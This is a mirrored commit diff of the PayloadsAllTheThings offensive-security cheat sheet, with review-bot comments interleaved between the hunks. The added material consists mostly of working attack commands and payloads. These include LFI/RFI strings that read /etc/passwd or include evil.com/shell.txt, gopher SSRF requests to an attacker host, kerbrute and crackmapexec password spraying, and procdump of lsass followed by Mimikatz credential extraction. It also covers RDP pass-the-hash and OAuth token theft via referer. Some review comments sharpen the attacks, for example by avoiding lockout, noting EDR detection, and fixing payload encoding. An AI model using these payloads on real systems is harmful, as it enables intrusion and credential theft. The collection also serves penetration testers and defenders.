mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp
This commit is contained in:
parent
765c615efe
commit
bab04f8587
@ -7,6 +7,10 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Basic LFI](#basic-lfi)
|
* [Basic LFI](#basic-lfi)
|
||||||
|
* [Null byte](#null-byte)
|
||||||
|
* [Double encoding](#double-encoding)
|
||||||
|
* [Path truncation](#path-truncation)
|
||||||
|
* [Filter bypass tricks](#filter-bypass-tricks)
|
||||||
* [Basic RFI](#basic-rfi)
|
* [Basic RFI](#basic-rfi)
|
||||||
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||||
* [Wrapper php://filter](#wrapper-phpfilter)
|
* [Wrapper php://filter](#wrapper-phpfilter)
|
||||||
@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
|
|||||||
http://example.com/index.php?page=../../../etc/passwd
|
http://example.com/index.php?page=../../../etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
Null byte
|
### Null byte
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=../../../etc/passwd%00
|
http://example.com/index.php?page=../../../etc/passwd%00
|
||||||
```
|
```
|
||||||
|
|
||||||
Double encoding
|
### Double encoding
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
||||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
||||||
```
|
```
|
||||||
|
|
||||||
Path truncation
|
### Path truncation
|
||||||
|
|
||||||
|
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
|
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
|
||||||
|
http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE]
|
||||||
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
|
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
Filter bypass tricks
|
### Filter bypass tricks
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=....//....//etc/passwd
|
http://example.com/index.php?page=....//....//etc/passwd
|
||||||
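Review bot: the new path truncation paragraph ("a filename longer than 4096 bytes will be cut off") and the `%00` trick in the Null byte block above it need a version caveat, since both depend on PHP 5.2-era behaviour (the `%00` rejection in `include` landed in 5.3.4 and the length truncation went with the same generation); without that a reader burns time on a modern install where neither can work. The third payload in the Path truncation block is only `[ADD MORE]` placeholders; tie it to the figure in the paragraph ("pad with `/.` until the whole path exceeds 4096 bytes") so the reader knows when to stop. Style: these blocks hold plain URLs, so a fence without `powershell` would be less misleading than the one used here.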
@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
|
|||||||
http://example.com/index.php?page=http://evil.com/shell.txt
|
http://example.com/index.php?page=http://evil.com/shell.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Null byte
|
### Null byte
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
||||||
```
|
```
|
||||||
|
|
||||||
Double encoding
|
### Double encoding
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
||||||
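Review bot: `### Null byte` and `### Double encoding` here duplicate the headings this same commit adds under Basic LFI, so GitHub's slug generation turns this second pair into `#null-byte-1` / `#double-encoding-1`, which the Summary entries `[Null byte](#null-byte)` and `[Double encoding](#double-encoding)` never reach; rename these (for example `### Null byte (RFI)`) and add matching Summary lines, or nest the Summary entries under Basic LFI / Basic RFI so each link has one target.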
@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
|
|||||||
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
||||||
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
||||||
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
||||||
|
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||||
|
@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
|
|||||||
enum4linux | grep -i desc
|
enum4linux | grep -i desc
|
||||||
There are 3-4 fields that seem to be common in most AD schemas:
|
There are 3-4 fields that seem to be common in most AD schemas:
|
||||||
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
||||||
|
|
||||||
|
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
|
||||||
```
|
```
|
||||||
|
|
||||||
### PassTheTicket Golden Tickets
|
### PassTheTicket Golden Tickets
|
||||||
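Review bot: `Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'"` enumerates every enabled domain account through WMI, which is slow and noisy on a large domain for what is really a lookup of the Description attribute; since the surrounding text is about passwords stored in descriptions, a lighter form such as `Get-ADUser -Filter * -Properties Description | Select Name, Description`, or the module-free `([adsisearcher]"(&(objectCategory=user)(description=*))").FindAll()`, fits the purpose better. Also say that `COMPANYDOMAIN` is the NetBIOS domain name, not the DNS name, and fix the missing space in `PasswordRequired,PasswordChangeable` to match the other fields.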
@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module
|
|||||||
|
|
||||||
### Password spraying
|
### Password spraying
|
||||||
|
|
||||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
||||||
|
|
||||||
|
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||||
|
```
|
||||||
|
|
||||||
Most of the time the best passwords to spray are :
|
Most of the time the best passwords to spray are :
|
||||||
|
|
||||||
- Password1
|
- Password1
|
||||||
|
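Review bot: the new crackmapexec line sprays every candidate from the mask `Pass@wor?l?a` (26 x 95 = 2470 passwords) against a whole /24 with no word about lockout; the example targets `Administrator`, but the sentence generalises this to spraying, so readers adapting it to a user list need to be told to check the policy first (`crackmapexec smb <target> -u user -p pass --pass-pol`, or `net accounts /domain`) and keep attempts per account under the threshold. `mp64` is never introduced: say it is hashcat's maskprocessor (`mp64.bin` in its release archive). The mask is also unquoted, so the `?` characters are exposed to shell globbing; write `-p $(./mp64.bin 'Pass@wor?l?a')`, which avoids the backtick-plus-subshell form that markdown will also mangle.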
@ -8,6 +8,7 @@
|
|||||||
* The Harvester
|
* The Harvester
|
||||||
|
|
||||||
* [Active Recon](#active-recon)
|
* [Active Recon](#active-recon)
|
||||||
|
* Masscan
|
||||||
* Nmap
|
* Nmap
|
||||||
* Nmap Script
|
* Nmap Script
|
||||||
* RPCClient
|
* RPCClient
|
||||||
@ -47,6 +48,13 @@
|
|||||||
|
|
||||||
## Active recon
|
## Active recon
|
||||||
|
|
||||||
|
* Masscan
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||||
|
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||||
|
```
|
||||||
|
|
||||||
* Basic NMAP
|
* Basic NMAP
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
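Review bot: the Masscan block is fenced as ```powershell while the adjacent Basic NMAP block is ```bash; these are Linux commands, so use bash. On content, `--rate 10000` across `-p1-65535` is only safe on a link that can absorb it; over a VPN tunnel (the `-e tun0` case in the second line) packet loss silently drops open ports, so the text should say to use a lower rate there (the second example's 1000 is the right idea) and to confirm the result with nmap on the ports found, and that `-e` must be given whenever masscan cannot pick the right interface itself.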
@ -1,38 +1,14 @@
|
|||||||
# Network Discovery
|
# Network Discovery
|
||||||
|
|
||||||
## Netdiscover
|
## Summary
|
||||||
|
|
||||||
```powershell
|
- [Nmap](#nmap)
|
||||||
netdiscover -i eth0 -r 192.168.1.0/24
|
- [Masscan](#masscan)
|
||||||
Currently scanning: Finished! | Screen View: Unique Hosts
|
- [Netdiscover](#netdiscover)
|
||||||
|
- [Responder](#responder)
|
||||||
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
|
- [Bettercap](#bettercap)
|
||||||
_____________________________________________________________________________
|
- [Reconnoitre](#reconnoitre)
|
||||||
IP At MAC Address Count Len MAC Vendor / Hostname
|
- [References](#references)
|
||||||
-----------------------------------------------------------------------------
|
|
||||||
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
|
|
||||||
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
|
|
||||||
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
|
|
||||||
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
|
|
||||||
```
|
|
||||||
|
|
||||||
## Responder
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
|
|
||||||
responder.py -I eth0 -wrf
|
|
||||||
```
|
|
||||||
|
|
||||||
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
|
||||||
|
|
||||||
## Bettercap
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
bettercap -X --proxy --proxy-https -T <target IP>
|
|
||||||
# better cap in spoofing, discovery, sniffer
|
|
||||||
# intercepting http and https requests,
|
|
||||||
# targetting specific IP only
|
|
||||||
```
|
|
||||||
|
|
||||||
## Nmap
|
## Nmap
|
||||||
|
|
||||||
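Review bot: the new Summary lists Nmap, Masscan, Netdiscover, Responder, Bettercap, Reconnoitre, References, but after this commit the file's actual order is Nmap, Masscan, Reconnoitre, Netdiscover, Responder, Bettercap, References, because the three moved sections are re-inserted after Reconnoitre further down; either reorder the list or move the Reconnoitre section up so the table of contents follows the page.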
@ -121,6 +97,13 @@ Host script results:
|
|||||||
List Nmap scripts : ls /usr/share/nmap/scripts/
|
List Nmap scripts : ls /usr/share/nmap/scripts/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Masscan
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||||
|
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||||
|
```
|
||||||
|
|
||||||
## Reconnoitre
|
## Reconnoitre
|
||||||
|
|
||||||
Dependencies:
|
Dependencies:
|
||||||
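Review bot: this `## Masscan` block is byte-for-byte the same two commands this commit adds to the Active recon section of the Methodology page; keeping two copies means they drift, so keep the full block in one place (this page is the natural home) and have the other link to it. The fence should be ```bash rather than ```powershell for Linux commands.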
@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
|
|||||||
If you have a segfault with nbtscan, read the following quote.
|
If you have a segfault with nbtscan, read the following quote.
|
||||||
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
||||||
|
|
||||||
|
## Netdiscover
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
netdiscover -i eth0 -r 192.168.1.0/24
|
||||||
|
Currently scanning: Finished! | Screen View: Unique Hosts
|
||||||
|
|
||||||
|
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
|
||||||
|
_____________________________________________________________________________
|
||||||
|
IP At MAC Address Count Len MAC Vendor / Hostname
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
|
||||||
|
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
|
||||||
|
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
|
||||||
|
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
|
||||||
|
```
|
||||||
|
|
||||||
|
## Responder
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
|
||||||
|
responder.py -I eth0 -wrf
|
||||||
|
```
|
||||||
|
|
||||||
|
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
||||||
|
|
||||||
|
## Bettercap
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
bettercap -X --proxy --proxy-https -T <target IP>
|
||||||
|
# better cap in spoofing, discovery, sniffer
|
||||||
|
# intercepting http and https requests,
|
||||||
|
# targetting specific IP only
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [TODO](TODO)
|
* [TODO](TODO)
|
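Review bot: the moved Netdiscover, Responder and Bettercap sections come back unchanged, so `## References` still carries the `* [TODO](TODO)` placeholder that the new Summary now links to; fill it or drop the entry. `bettercap -X --proxy --proxy-https -T <target IP>` is the legacy Ruby bettercap 1.x command line, not the syntax of the Go rewrite (caplets and `net.probe` / `arp.spoof` / `http.proxy` modules), so label which version the block is for. The three blocks are also fenced ```powershell for Linux commands.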
@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
|
|||||||
## Spawn TTY Shell
|
## Spawn TTY Shell
|
||||||
|
|
||||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||||
|
|
||||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
||||||
|
|
||||||
|
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
ctrl+z
|
ctrl+z
|
||||||
echo $TERM && tput lines && tput cols
|
echo $TERM && tput lines && tput cols
|
||||||
|
|
||||||
|
# for bash
|
||||||
stty raw -echo
|
stty raw -echo
|
||||||
fg
|
fg
|
||||||
|
|
||||||
|
# for zsh
|
||||||
|
stty raw -echo; fg
|
||||||
|
|
||||||
reset
|
reset
|
||||||
export SHELL=bash
|
export SHELL=bash
|
||||||
export TERM=xterm-256color
|
export TERM=xterm-256color
|
||||||
|
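Review bot: the block reads the terminal size with `echo $TERM && tput lines && tput cols` but never applies it; after `fg` and `reset`, add `stty rows <lines> cols <cols>` in the upgraded shell, otherwise editors and pagers wrap at the wrong width, which is the only reason those values were queried. The zsh variant `stty raw -echo; fg` is right for the reason the quote gives, but the quote has no source link; add one. It would also help to mark which side each line runs on: the `tput` line on the attacker box before `ctrl+z`, and `reset`, `export SHELL=bash`, `export TERM=xterm-256color` in the victim shell after `fg`.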
@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
|
|||||||
mimikatz_command -f sekurlsa::wdigest
|
mimikatz_command -f sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Mimikatz - Mini Dump
|
||||||
|
|
||||||
|
Dump the lsass process.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||||
|
|
||||||
|
net use Z: https://live.sysinternals.com
|
||||||
|
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||||
|
```
|
||||||
|
|
||||||
|
Then load it inside Mimikatz.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
mimikatz # sekurlsa::minidump lsass.dmp
|
||||||
|
Switch to minidump
|
||||||
|
mimikatz # sekurlsa::logonPasswords
|
||||||
|
```
|
||||||
|
|
||||||
## Mimikatz Golden ticket
|
## Mimikatz Golden ticket
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
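Review bot: `net use Z: https://live.sysinternals.com` depends on the WebClient (WebDAV) service, which is not running on servers by default, and on outbound HTTPS to that host; say so, or the second form fails with a system error where the first (a local `procdump.exe`) works. The intro sentence "Dump the lsass process." should add that this needs SeDebugPrivilege (an elevated shell) and that `procdump -ma lsass.exe` is a widely signatured AV/EDR event, which is why the offline `sekurlsa::minidump` step is the quieter half; the dump also has to be opened with a mimikatz build of the same bitness as the target's lsass. Finally, `Switch to minidump` inside the fence is mimikatz's response, not a command; drop it or mark it as output so it is not typed.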
@ -119,18 +119,20 @@ or with crackmapexec
|
|||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||||
```
|
```
|
||||||
|
|
||||||
For Server 2012 R2, Win8.1+
|
or with Metasploit
|
||||||
|
|
||||||
```powershell
|
|
||||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
|
||||||
```
|
|
||||||
|
|
||||||
with Metasploit
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
run getgui -u admin -p 1234
|
run getgui -u admin -p 1234
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Then log in using xfreerdp
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
|
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Netuse (Windows)
|
## Netuse (Windows)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
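Review bot: `xfreerd /u:runner /v:10.0.0.1` is a typo for `xfreerdp`. The comment moved onto the `/pth` line keeps the "Server 2012 R2 / Win 8.1+" floor but loses the reason: RDP pass-the-hash needs Restricted Admin mode on the target (`DisableRestrictedAdmin` set to 0 under `HKLM\System\CurrentControlSet\Control\Lsa`), which is what that version floor refers to, and enabling RDP through the `-M rdp` module above does not turn it on; one sentence saying so prevents the usual failed-logon confusion. Also note that the Metasploit `getgui -u admin -p 1234` path creates a new local user rather than reusing the hash, so the two alternatives are not interchangeable.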
@ -1,4 +1,20 @@
|
|||||||
# OAuth 2 - Common vulnerabilities
|
# OAuth
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
|
||||||
|
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
|
||||||
|
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
|
||||||
|
- [OAuth private key disclosure](#oauth-private-key-disclosure)
|
||||||
|
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
|
||||||
|
- [Cross-Site Request Forgery](#cross-site-request-forgery)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
## Stealing OAuth Token via referer
|
||||||
|
|
||||||
|
From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
|
||||||
|
|
||||||
|
> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer
|
||||||
|
|
||||||
## Grabbing OAuth Token via redirect_uri
|
## Grabbing OAuth Token via redirect_uri
|
||||||
|
|
||||||
|
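Review bot: the Summary anchors `#grabbing-oauth-token-via-redirect---uri` and `#executing-xss-via-redirect---uri` will not resolve: GitHub's heading slugs keep underscores, so `## Grabbing OAuth Token via redirect_uri` becomes `#grabbing-oauth-token-via-redirect_uri` (likewise `#executing-xss-via-redirect_uri`). The referer section should state the precondition the tweet leaves implicit: the token has to be in the query string (an authorization `code`, or a token returned in the query) because URL fragments are never sent in the Referer header, so the implicit-flow `#access_token=` form does not leak this way, and a `Referrer-Policy` of `no-referrer` or `same-origin` on the landing page defeats it.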
@ -2,7 +2,7 @@
|
|||||||
|
|
||||||
A list of useful payloads and bypasses for Web Application Security.
|
A list of useful payloads and bypasses for Web Application Security.
|
||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
I <3 pull requests :)
|
I :heart: pull requests :)
|
||||||
|
|
||||||
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
||||||
|
|
||||||
|
@ -277,6 +277,13 @@ You didn't say the magic word !
|
|||||||
QUIT
|
QUIT
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Gopher HTTP
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
|
||||||
|
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
|
||||||
|
```
|
||||||
|
|
||||||
#### Gopher SMTP - Back connect to 1337
|
#### Gopher SMTP - Back connect to 1337
|
||||||
|
|
||||||
```php
|
```php
|
||||||
|
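Review bot: the two gopher payloads are inconsistent: the first leaves the spaces in `_GET http://<attacker:80>/x HTTP/1.1` unencoded and puts the port inside the placeholder (`<attacker:80>`), the second encodes them as `%20` and writes `<attacker>:80`. Gopher URLs have to be percent-encoded or the URL parser in the SSRF sink truncates at the first space, so make the first line `gopher://<proxyserver>:8080/_GET%20http://<attacker>:80/x%20HTTP/1.1%0A%0A`. Both use bare `%0A`; most HTTP/1.1 servers tolerate LF, but `%0D%0A` is the specified line ending and fails less often. The block is fenced ```powershell for URLs while the next block uses ```php; a plain fence would do.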
@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
|||||||
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
|
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
|
||||||
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
|
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
|
||||||
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
|
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
|
||||||
- he is able to make stored XSS from a irrelevant domain to main facebook domain
|
|
||||||
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
|
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
|
||||||
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
|
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
|
||||||
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
|
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
|
||||||
|